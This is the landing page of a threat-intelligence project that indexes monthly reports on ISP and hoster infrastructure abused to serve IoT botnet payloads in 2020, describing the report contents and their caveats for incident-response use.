IoT_Malware_Abuse

IoT Intrusion Payload Infrastructure Abuse Report

[About] [Material and Definition] [Reports] [View in: Github Code or Github Page]

IoT Malware Abuse Project

About

Thank you for your advise and feedback to improve our report on IoT Intrusion Malware Payload that Abuse ISP (hoster and broadband/pool) services.

These are our on-going reports (TLP WHITE) for IoT intrusion activities detected from our side. The data is shared to monitor the abuse incident response follow up and its prevention for the related affected ISP, hoster(s) and networks with the sole purpose as incident response management reference.

These reports are made based on detected loaders (either as scripts or “hexstrings” pushed loaders) contains the downloaded payloads from abused ISP/hoster(s) during the IoT malware infection efforts, that have been spotted during its intrusion session attacks coming from compromised malware botnet(s) or from its C2 infection scanners (it is also called as loaders or spreaders by adversaries). The current monitoring is aiming for IoT intrusion from telnet protocol weak passwords and IoT web interface vulnerabilities.

License: BSD version 2 Simplified (FreeBSD)

Contact: Twitter @malwaremustd1e

The material and definition

The report is provided in monthly basis, each contains of these parts:

  • The most abused hoster(s) list.
  • The IP and the served IoT malware payload’s filename list.
  • The network information from where each unique IP has been used to infect.
  • In addition, the P2P (Peer-to-Peer) IP of IoT devices infected by IoT botnet in pool’s IP.

The annual compiled data is provided as an overall database of:

  • Recorded IP addresses of abused hosters that have served payloads.
  • Recorded peers of IoT nodes that have served payloads.

Several notes for the served data:

  • Multiple records of intrusion efforts are possibly occurred from the same IP addresses.
  • There is a possibility of multiple actor’s origins from the same shared malicious host.
  • Some of the recorded payload IP addresses could be inactive due to the possibility that the botnet are still working without actor’s control.
  • Some hosts are maybe legitimate due to the possibility of a compromised environment has been used to spread the IoT malware infection scripts.
  • Several hosts “might be” belong to researchers that we can not filter.
  • The peer-to-peer IoT infection sources IP is from payload request activity of IoT malware P2P infection from the broadband networks, it is a dial-up dynamic IP addresses which may change during re-dial.

Reports

Monthly Reports:

[May 2020] [June 2020] [July 2020] [August 2020] [September 2020] [October 2020] [November 2020] [December 2020]

Annual Abused IP Database:

[IoT Malware’s C2 2020 / ISP Abused IP Records] [IoT Malware’s 2020’s P2P Abused IP Records]

Recent Regional Abused Heatmap Graphs:

Overall IoT Malware C2 in 2020

Overall P2P IoT Botnet in 2020

Graph for growth of C2 and P2P in 2020:

C2

P2P

malwaremustdie.org, 2020 | maintainer: @unixfreaxjp